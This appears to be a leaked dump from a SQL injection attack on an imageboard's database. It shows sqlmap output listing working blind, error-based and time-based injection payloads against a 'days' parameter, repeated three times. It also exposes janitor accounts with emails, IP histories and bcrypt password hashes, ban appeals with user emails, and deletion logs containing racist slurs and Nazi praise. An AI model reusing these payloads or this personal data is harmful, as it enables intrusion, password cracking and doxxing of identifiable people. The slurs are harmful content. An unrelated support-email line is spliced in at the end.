[*] janitor, lgbt,y, , pr89090@gmail.com, , 330, {"72.19.109.172":1397190190,"10.0.0.19":1398136150,"72.19.109.6":1397244851,"72.19.109.205":1397293035,"72.19.108.254":1397408973,"72.19.110.20":1397467120,"72.19.108.24":1397509287,"72.19.110.106":1398143271,"72.19.111.56":1397608893,"72.19.110.36":1397641637,"72.19.108.169":1397722943}, 1049, 2014-04-13 01:21:38, $2y$10$u7DyqyJinWPqDUibQelyq.Mud4wDebLpEo.KgTBBnAmf7oHVV5402, 0, FrozenSilver
[*] janitor, int, , Draegone@gmail.com, , 329, {"76.178.125.8":1398154852,"10.0.0.19":1398154341,"204.229.223.9":1397670055,"184.184.114.202":1397996245,"108.220.81.171":1397984024,"108.72.0.12":1398029387}, 2357, 2014-04-22 00:32:39, $2y$10$TE09aDj75e0uUzpwFp/cQOK4dwPxmGHchTfPsQyNM2UM94/wMzj8C, 0, Drae
[*] janitor, vg, , lorentzkiele@gmail.com, , 328, {"212.233.49.131":1398137539,"10.0.0.19":1398137066}, 2564, 2014-04-21 21:30:03, $2y$10$XGoD0ZbGKpdRS1r8z1ko.eup8yx9GqmIYAlCUDgOCXE7SB0cqc4bK, 0, lorentzkiele
[*] janitor, e,s, , nathanyoung1014@gmail.com, , 327, {"98.211.28.0":1398046286,"10.0.0.19":1398046252}, 1572, 2014-04-12 15:42:22, $2y$10$u/TBhzNVhb0b6n6fkuxAgeFTyZRRsmnFWKxvo9BlJjDr5mXTRFkBq, 0, Rhythmatic
[*] janitor, tv, , aglelc@email.appstate.edu, , 326, {"71.68.32.46":1398153790,"10.0.0.19":1398153479}, 691, 2014-04-14 21:36:00, $2y$10$UC8hlmjDsYxYq5Ldsa3Mo.tpjAAhgwAsDJp0MIxYv.Za2WPXJOxOW, 0, BrainSledge
[*] janitor, k, , s0beit@haruhichan.com, , 325, {"99.133.150.138":1398154442,"10.0.0.19":1398154272}, 293, 2014-04-12 18:44:21, $2y$10$NbH.kWUzpSXQjzIW4c9LveE90wmxD/WCxfF6BxEzWn/vZPTYi9QkO, 0, theomeo
[*] janitor, vg, , cepheidev+4chan@gmail.com, , 324, {"93.220.249.194":1396831898,"10.0.0.19":1398122799,"93.220.243.171":1396862450,"93.220.235.65":1396901223,"93.220.252.121":1397000547,"93.220.217.240":1397062258,"93.220.232.120":1397269465,"93.220.199.105":1397355616,"93.220.193.224":1397427854,"93.220.199.228":1397514342,"93.220.194.123":1397598275,"93.220.209.61":1397705191,"93.220.235.201":1397763781,"93.220.193.206":1397903603,"93.220.210.192":1397972378,"93.220.253.63":1398074943,"93.220.238.90":1398144185}, 2350, 2014-04-12 16:23:37, $2y$10$0CKhtQRoaG6K4XpJqZqBruCxr/WPLfx9n009mjq/hPvuykCijA8Am, 0, Cephei
[*] janitor, cgl,soc, , cagle.sara@gmail.com, , 323, {"128.61.28.52":1396843567,"10.0.0.19":1398141079,"128.61.20.34":1397197760,"128.61.16.214":1397451700,"128.61.23.200":1397721594,"128.61.21.213":1398141128}, 3691, 2014-04-13 14:01:15, $2y$10$b2irtlwrbZBvyI6/ue8v8.4N6vODRWtILIVJagjXOAKm57pNOt/mG, 0, akkerzaigts
[*] janitor, int, , poemaromana@gmail.com, , 322, {"90.147.23.92":1398156615,"90.147.23.93":1397918735,"10.0.0.19":1398156616,"128.40.79.34":1398096965}, 2968, 2014-04-13 11:27:52, $2y$10$WRmKRw4qCKy72Kz1RCFQIuuZr9gqnSo/A3BCSu5VQ1NmV2z4KJmzO, 0, shermanfirefly
select * from del_log order by id desc [2]:
[*] Cadfael, 188.29.164.64, sp, 0, HITLER IS THE BEST, , 109.png, 11392048, 1, 0, Anonymous, 46760462, 0, , 0, , 2014-04-22 06:56:30
[*] Cadfael, 188.29.164.64, sp, 0, HITLER IS THE BEST, , 109.png, 11392048, 1, 0, Anonymous, 46760462, 0, , 0, , 2014-04-22 06:56:30
select count(*) from del_log where admin='moot' and admin_ip="121.219.238.59" and board='sp' order by id desc: '157'
select * from del_log where board='sp' order by id desc [5]:
[*] Pasternack, 68.42.67.186, sp, 0, <span class="quote">></span><a href="https://ww, , 468763513581.jpg, 11392078, 1, 0, Anonymous, 46762114, 0, , 0, , 2014-04-22 07:08:32
[*] Cadfael, 188.29.164.64, sp, 0, <span class="quote">>free moyes</span>, , 083.jpg, 11392073, 1, 0, Anonymous, 46761810, 0, , 0, , 2014-04-22 07:06:44
[*] Cadfael, 188.29.164.64, sp, 0, http://www.youtube.com/watch?v=SFVv<wbr>_Vz0V38\n\ngod the bless the USA, where a wild monkey nigger fucks hot white girls, , 6786725345345.jpg, 11392050, 1, 0, Anonymous, 46758739, 0, , 0, , 2014-04-22 06:56:49
[*] Cadfael, 188.29.164.64, sp, 0, GFHS, , 4685454681837.jpg, 11392049, 1, 0, Anonymous, 46760207, 0, , 0, , 2014-04-22 06:56:30
[*] Cadfael, 188.29.164.64, sp, 0, HITLER IS THE BEST, , 109.png, 11392048, 1, 0, Anonymous, 46760462, 0, , 0, , 2014-04-22 06:56:18
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from appeals [8]:
[*] 287, 0, 0, potatosan, tabt@juno.com, It was an obvious troll thread that I posted the remark to. If I am banned the OP should be as well. , 2006-05-26 15:23:25
[*] 278, 0, 0, potatosan, x3llos@gmail.com, yah so, weaboo is a forbidden word on /v/ now or something?
cuz "STOP USING THE WORD WEABOO" is what the janitor posted after he banned me lol
, 2006-05-26 21:02:51
[*] 377, 0, 0, Mr VacBob, Drulnu24@hotmail.com, ....there was no sex at all in that picture...Mr Tadakichi was licking her foot, 2006-05-27 01:01:07
[*] 268, 0, 0, pixel, , code is gay., 2006-05-28 17:50:04
[*] 562, 0, 0, tripon, , NO REASON HMM??
whoever is reading this, GET OVER IT ITS CALLED A PROXY, and not even YOU can stop it, 2006-05-29 05:14:47
[*] 358, 0, 0, , ganon12@hotmail.com, This ip is from a Shared internet connection...
First time in this page, 2006-05-30 02:12:39
[*] 693, 0, 0, , , wtf, 2006-05-30 20:01:11
[*] 726, 0, 0, pixel, , this is a proxy lol, 2006-05-30 21:12:34
select * from appeals order by no desc [15]:
[*] 3101050, 1, 1, Beam, , Just posted the list so /a/ can laugh at the terribly low powerlevel of some of the board's prolific shitposters., 2014-04-22 18:57:03
[*] 3101042, 0, 0, , graywolf3@gmail.com, While I will agree that posting a link to my MAL account was inappropriate for the board I was posting it on, I fail to understand how it might be construed as advertising. I plea that my ban be changed to a ban local to /a/, as I believe I only violated rules relevant to that board. Thank you., 2014-04-22 18:52:09
[*] 3101033, 0, 0, , DurantForMVP@yahoo.com, B-b-but I was only pretending to be retarded!, 2014-04-22 18:47:53
[*] 3101032, 0, 0, , , Go fuck your autistic janitor self. You know damn well I was not advertising in any way. I posted a list of the anime I've seen and how I rated it on /a/. Congrats on banning my university cafe's IP though, your mother must be proud. I'm done with my coffee anyways, see you in a few minutes when I get home :^), 2014-04-22 18:43:49
[*] 3100946, 0, 0, , izakjruud@gmail.com, Good evening.\r\nI believe I should be unbanned from this absolutely wonderful website because I did not read the rules and therefor could not follow them. I am legally blind, and therefor can not read or write. I hope 4chan takes this handicap of mine very seriously. Also, I did not even start the said thread in question. You see, my cat did it. Yes, that feline devil started the thread which got me banned. (How could I start it if i'm blind!?) I have seriously spoken to my cat and have devised a very appropriate punishment for her. I took away her yarn ball. I know that sounds very rash and some-what abusive but I take breaking the rules of 4chan very seriously. So seriously, I have just printed out the rules and have plastered them around her play area in the event she feels the need to post again. \r\nThank you for your time, and I hope you take my medical handicap very seriously. \r\nGood bye for now,\r\nAnonymous, 2014-04-23 00:14:05
[*] 3100674, 1, 1, yournamehere, , "The quality of posts is extremely important , 2014-04-22 15:51:05
[*] 3100532, 1, 1, yournamehere, , Oh well, I was just avin a laugh but next time I'll read the rules more thoroughly before posting, 2014-04-22 13:04:59
[*] 3100066, 0, 0, , zak.crabtree@yahoo.com, Sorry for that post. I shouldn't have done it, I was drunk and forgot that it wasn't /k/, and that was against the rules. Sorry. Can I please be unbanned? I won't make that mistake again. Regards, 2014-04-23 00:12:41
[*] 3099587, 1, 1, yournamehere, mattoledo1919@gmail.com, Its not my YouTube. I was only showing /pol/ the stupidity of the feminist people.\r\nI was not advertising. I was merely sharing a link that I wanted to share., 2014-04-22 14:39:46
[*] 3099207, 1, 1, Beam, fuckthejanitors@badgoyim.com, Heeeeeee does it for freeee\r\nHot Pockets, every meal\r\nJaaaaaaanitor of speeee\r\nA girl, he'll never feel\r\n\r\nHe volunteers his time for no monetary compensation\r\nConsuming, abusing\r\nThis lack of motivation, all his time he's spending\r\nDeleting, he can't seem...\r\n\r\nTo find any real friends\r\nHe gains weight to no end\r\n(deleting threads he doesn't like, he's convinced he has actual power, to rule)\r\nHe can't fit through a door\r\nHe just wants moooooooore\r\n\r\nHeeeeeee does it for freeee\r\nHot Pockets, everymeal\r\nJaaaaaaanitor of speeeeeee\r\nA girl, he'll never feel\r\n\r\nHe makes /sp/ worse by deleting all the good threads\r\nDisgusting, revolting\r\nAgainst all fun, he stares into his own reflection\r\nHe's crying, he can't seem...\r\nTo find any real friends\r\nHe gains weight to no end\r\n(deleting threads he doesn't like, he's convinced he has actual power, to rule)\r\nHe can't fit through a door\r\nHe just wants moooooooore\r\n\r\nHeeeeeee does it for freeee\r\nHot Pockets, every meal\r\nJaaaaaaanitor of speeee\r\nA girl, he'll never feel\r\n\r\nHeeeeeee does it for freeee\r\nHot Pockets, every meal\r\nJaaaaaaanitor of speeee\r\nA girl... A girl, he'll never feel\r\n, 2014-04-21 18:56:16
[*] 3099193, 1, 1, yournamehere, Fabbyfubz@gmail.com, I tried to upload a .gif and it said there was an embedded virus. I have no malicious intent or any knowledge that there was anything embedded in the image, so the detection might have made a mistake. Either way, in case it wasn't wrong, I deleted the image from my hard drive.\r\n\r\nThis is the .gif I tried to post on 4chan, uploaded to imgur. \r\n\r\nhttp://i.imgur.com/Uo5FL3W.gif, 2014-04-21 18:14:03
[*] 3099121, 0, 0, , , fuck off fags how was i supposed to know., 2014-04-21 16:39:09
[*] 3099066, 1, 1, yournamehere, khorrocks@cangreen.ca, Sorry, haven't looked at the rules in a long time so didn't realize this was not allowed.\r\n\r\nMy bad., 2014-04-21 16:06:00
[*] 3098908, 1, 1, yournamehere, , FOR YOU, 2014-04-21 14:09:20
[*] 3097999, 1, 1, yournamehere, seahawks_32@yahoo.com, What is it exactly I am banned for? It says that I am banned from all boards for being "oh so c, 2014-04-21 16:06:49
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select count(*) from pass_users;: '12740'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * del_logs where board=`int` [1]:For immediate assistance, please email our customer support: support@toptal.com